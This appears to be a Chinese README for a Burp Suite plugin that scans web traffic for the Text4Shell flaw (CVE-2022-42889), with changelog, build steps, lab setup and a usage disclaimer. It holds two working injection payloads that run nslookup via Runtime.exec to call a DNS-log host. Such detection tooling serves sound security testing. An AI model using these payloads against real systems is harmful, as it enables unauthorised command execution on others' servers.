使用java编写的Text4shell burp被动扫描插件
java maven项目,可以使用mvn package
进行编译
1.0 - 首次上传,对所有经过burp的包进行被动扫描,扫描对象包括了json、xml、fileupload
1.1 - 修复了body为空时导致的检测错误,修复了对URL参数不检测的错误
1.2 - 修复了body仅有json与xml时出现的参数构造错误,修复了dns二次检测时未获取key导致的错误
1.3 - 添加了主动扫描功能
1.4 - 添加了header黑名单功能,可以在resources/config.yml中修改
- "%24%7Bscript%3Ajavascript%3Ajava.lang.Runtime.getRuntime%28%29.exec%28%27nslookup+dns-url%27%29%7D"
- "${script:javascript:java.lang.Runtime.getRuntime().exec('nslookup dns-url')}"
可以在resources/config.yml
修改
使用github中的https://github.com/karthikuj/cve-2022-42889-text4shell-docker搭建环境
代理访问http://yourip:80/text4shell/attack?search=aaa
,开始扫描
在logger中可看见插件发送的包
仅对是否可以dnslog进行扫描,若dnslog接受到请求,则爆出漏洞
在resources/config.yml
中的dnsLogModule
修改dnslog配置,使用时可以修改为自搭建的DnsLog服务器
https://github.com/pmiaowu/BurpFastJsonScan
https://github.com/f0ng/log4j2burpscanner
该工具仅用于安全自查检测
由于传播、利用此工具所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,作者不为此承担任何责任。
本人拥有对此工具的修改和解释权。未经网络安全部门及相关部门允许,不得善自使用本工具进行任何攻击活动,不得以任何方式将其用于商业目的。